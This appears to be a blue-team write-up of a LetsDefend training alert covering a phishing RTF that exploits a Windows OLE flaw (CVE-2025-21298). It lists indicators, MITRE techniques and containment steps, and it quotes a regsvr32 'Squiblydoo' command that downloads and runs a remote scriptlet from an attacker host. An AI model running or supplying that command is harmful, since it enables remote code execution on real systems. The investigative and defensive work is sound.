// soc investigation 2026-02-08
SOC336 Windows OLE Zero-Click RCE Exploitation Detected (CVE-2025-21298)
letsdefend Medium closed ✓ true positive
phishing mitre/T1566-001 mitre/T1203 mitre/T1218-010 mitre/T1105 mitre/T1059-003
▶ watch on youtube ← all alerts
analyst verdict TRUE POSITIVE

🎯 MITRE ATT&CK

T1566.001 Phishing Attachment
T1203 Exploitation for Client Execution
T1218.010 Regsvr32
T1105 Ingress Tool Transfer
T1059.003 Windows Command Shell

👤 Who

The affected user is Austin@letsdefend.io.
The malicious email was sent from projectmanagement@pm.me using SMTP address 84.38.130.118.
The endpoint executed cmd.exe which launched regsvr32.exe to retrieve a remote payload.

🔎 What

Alert SOC336 detected exploitation of CVE-2025-21298, a Windows OLE zero-click remote code execution vulnerability delivered via a malicious RTF attachment named mail.rtf.
The attachment hash df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184 was confirmed malicious on VirusTotal.
The endpoint executed the command C:\Windows\System32\cmd.exe /c regsvr32.exe /s /u /i:http://84.38.130.118.com/shell.sct scrobj.dll.
This indicates a living-off-the-land technique commonly known as Squiblydoo, using regsvr32 to download and execute a remote scriptlet.

🕐 When

The alert triggered on Feb 04, 2025 at 04:18 PM.

📍 Where

The attack targeted the endpoint belonging to Austin@letsdefend.io.
Network logs confirm a successful HTTP GET request to http://84.38.130.118.com/shell.sct. The malicious infrastructure is associated with IP address 84.38.130.118.

💡 Why

The attacker exploited CVE-2025-21298, which allows remote code execution when a specially crafted email is previewed in Microsoft Outlook.
The vulnerability does not require the user to open the attachment, enabling zero-click execution.
The attacker used regsvr32 to bypass application controls and execute remote malicious code. How
A phishing email with a malicious RTF attachment exploiting CVE-2025-21298 was delivered.
Outlook preview triggered the vulnerability and executed code automatically.
The exploit launched cmd.exe which executed regsvr32.exe.
regsvr32 retrieved and executed a remote scriptlet from 84.38.130.118.com.
The endpoint successfully connected to the malicious server and executed the payload, resulting in compromise. Conclusion
The endpoint is confirmed compromised due to successful exploitation and remote payload execution.
Immediate containment is required including isolating the host, blocking the malicious domain and IP, and escalating to Incident Response

← alert log inksec.io blue team ops →